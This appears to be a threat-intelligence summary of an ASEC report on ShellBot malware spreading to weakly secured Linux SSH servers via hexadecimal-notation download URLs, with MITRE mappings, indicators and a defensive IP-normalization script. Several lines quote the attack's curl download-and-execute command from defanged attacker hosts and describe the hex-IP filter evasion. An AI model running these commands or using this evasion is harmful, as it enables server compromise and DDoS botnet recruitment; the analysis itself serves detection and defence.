ShellBot DDoS Malware Installed Through Hexadecimal Notation Addresses – ASEC BLOG

ASEC reports ShellBot malware is now installed on poorly managed Linux SSH servers using hexadecimal IP addresses for its download URLs. The campaign features DDoS PBot v2.0 with IRC-based C2 and hex-encoded endpoints used to evade URL detection. #ShellBot #DDoSPBot #HexadecimalIP #LinuxSSH #IRC #dred

Keypoints

  • ShellBot targets poorly managed Linux SSH servers, gaining access through dictionary attacks against port 22 that use lists of commonly used SSH credentials.
  • Download URLs for ShellBot have shifted from regular IP addresses to hexadecimal-encoded addresses to evade detection.
  • Past cases show actors also used decimal and hexadecimal IP notations to hide malicious URLs (e.g., a pure-decimal address that resolves to an ordinary dotted-decimal IP).
  • ShellBot is Perl-based, communicates via IRC with a C2 server, and has variants such as DDoS PBot v2.0 that use the installation name “dred.”
  • Administrative guidance includes strong passwords, timely patching, and firewall usage; ASEC TIP provides IOC details for ongoing monitoring.
  • The operation flow often involves scanning SSH-enabled systems, authenticating, downloading the payload with curl, and executing via Perl.
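As an added illustration of the non-standard address notation described in the key points above (example code written for this summary, not code from ASEC or from the malware), the Python below normalizes any numeric IPv4 host that curl or inet_aton would accept, including pure hexadecimal, pure decimal, octal and mixed forms, back to dotted-decimal so that IoC matching and URL filtering still work. The sample command lines are constructed from the command shape the post quotes; the hexadecimal hosts are the ones listed in this page's IoC section, the decimal host is a constructed equivalent, and the IoC list itself is passed through the same normalizer so hex and dotted entries compare equal.

```python
import re
from typing import List, Optional, Set, Tuple

# One dotted-decimal component as curl/inet_aton accept it:
# "0x.." hexadecimal, a leading "0" octal, otherwise decimal.
_PART_RE = re.compile(r"0[xX][0-9a-fA-F]+|0[0-7]*|[1-9][0-9]*")

# URLs inside log or command text, including defanged "hxxp" and "[.]" forms.
_URL_RE = re.compile(r"\bh(?:xx|tt)ps?://([^/\s:]+)(?::(\d+))?", re.IGNORECASE)


def _parse_part(part: str) -> int:
    if part[:2].lower() == "0x":
        return int(part[2:], 16)
    if len(part) > 1 and part.startswith("0"):
        return int(part, 8)
    return int(part, 10)


def canonicalize_ipv4(host: str) -> Optional[str]:
    """Return the dotted-decimal form of a numeric IPv4 host, or None.

    Mirrors the classic inet_aton rules: one to four parts, each part in
    hex/octal/decimal, and the last part filling all remaining bytes.
    Hostnames and out-of-range values return None.
    """
    parts = host.split(".")
    if not 1 <= len(parts) <= 4 or not all(_PART_RE.fullmatch(p) for p in parts):
        return None
    values = [_parse_part(p) for p in parts]
    last_width = 4 - (len(values) - 1)  # bytes covered by the final part
    if any(not 0 <= v <= 255 for v in values[:-1]):
        return None
    if not 0 <= values[-1] < 256 ** last_width:
        return None
    addr = 0
    for v in values[:-1]:
        addr = (addr << 8) | v
    addr = (addr << (8 * last_width)) | values[-1]
    return ".".join(str((addr >> shift) & 0xFF) for shift in (24, 16, 8, 0))


def find_obfuscated_hosts(text: str) -> List[Tuple[str, str]]:
    """Return (host_as_written, dotted_decimal) for every URL whose host is a
    numeric address written in something other than plain dotted-decimal."""
    hits = []
    for match in _URL_RE.finditer(text):
        raw = match.group(1)
        refanged = raw.replace("[.]", ".")
        canonical = canonicalize_ipv4(refanged)
        if canonical is not None and canonical != refanged:
            hits.append((raw, canonical))
    return hits


def match_iocs(text: str, bad_ips: Set[str]) -> List[str]:
    """Canonicalize every URL host in text and return those on the IoC list."""
    found = []
    for match in _URL_RE.finditer(text):
        canonical = canonicalize_ipv4(match.group(1).replace("[.]", "."))
        if canonical in bad_ips:
            found.append(canonical)
    return found


# IoC hosts exactly as this page lists them (dotted and hexadecimal forms);
# normalizing them once lets later lookups ignore the notation used.
KNOWN_BAD_HOSTS = ["39.107.61.230", "39.165.53.17", "0x2763da4e", "0x74cc54bd"]
KNOWN_BAD_IPS = {canonicalize_ipv4(h) for h in KNOWN_BAD_HOSTS}

# Constructed sample command lines in the shape the post quotes; the last one
# uses a constructed decimal spelling of the first hexadecimal host.
SAMPLE_COMMANDS = [
    "curl -s -L hxxp://39.107.61[.]230/dred -o /tmp/dred;perl /tmp/dred",
    "curl -s -L hxxp://0x2763da4e/dred -o /tmp/dred;perl /tmp/dred",
    "curl -s -L hxxp://0x74cc54bd/static/home/dred/dred -o /tmp/dred;perl /tmp/dred",
    "curl -s -L hxxp://660855374/dred -o /tmp/dred;perl /tmp/dred",
]

if __name__ == "__main__":
    for line in SAMPLE_COMMANDS:
        print(find_obfuscated_hosts(line), match_iocs(line, KNOWN_BAD_IPS))
```

The practical point is that a blocklist or detection rule keyed on the literal string of a URL misses the same address written as `0x...` or as a single decimal number, while a rule keyed on the canonical dotted-decimal value catches every spelling; run the same normalizer over both the IoC feed and the observed command lines before comparing.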

MITRE Techniques

  • [T1110] Brute Force – Use of a dictionary attack on SSH accounts to gain access. Quote: “use a list of commonly used SSH account credentials to initiate their dictionary attack.”
  • [T1078] Valid Accounts – If login succeeds, attackers install malware using valid credentials. Quote: “If they manage to successfully log in, they are able to install a variety of malware.”
  • [T1105] Ingress Tool Transfer – Payload is downloaded (via curl) and executed on the target. Quote: “curl -s -L hxxp://39.107.61[.]230/dred -o /tmp/dred;perl /tmp/dred”
  • [T1059] Command and Scripting Interpreter – Uses shell commands and Perl to install and run malware. Quote: “uname -a;lspci | grep -i --color 'vga|3d|2d';curl -s -L hxxp://39.107.61[.]230/dred -o /tmp/dred;perl /tmp/dred”
  • [T1071] Command and Control – Malware communicates with a C2 server via IRC channels. Quote: “IRC control commands” and “uses IRC protocol to communicate with a C&C server.”

Indicators of Compromise

  • [IP Address] attack source addresses and C2 endpoints – 61.242.178[.]220, 192.3.141[.]163:6667, and other addresses
  • [MD5] file hashes – 8853bb0aef4a3dfe69b7393ac19ddf7f, 7bc4c22b0f34ef28b69d83a23a6c88c5, and 1 more (ShellBot – past/recent)
  • [URL] download URLs – hxxp://39.107.61[.]230/dred, hxxp://39.165.53[.]17:8088/iposzz/dred, and the hexadecimal-host forms 0x2763da4e/dred and 0x74cc54bd/static/home/dred/dred (recent)
  • [File Name] – dred (installation component used by ShellBot)
  • [C2 URL] – 192.3.141[.]163:6667 (ShellBot C2)

Read more: https://asec.ahnlab.com/en/57635/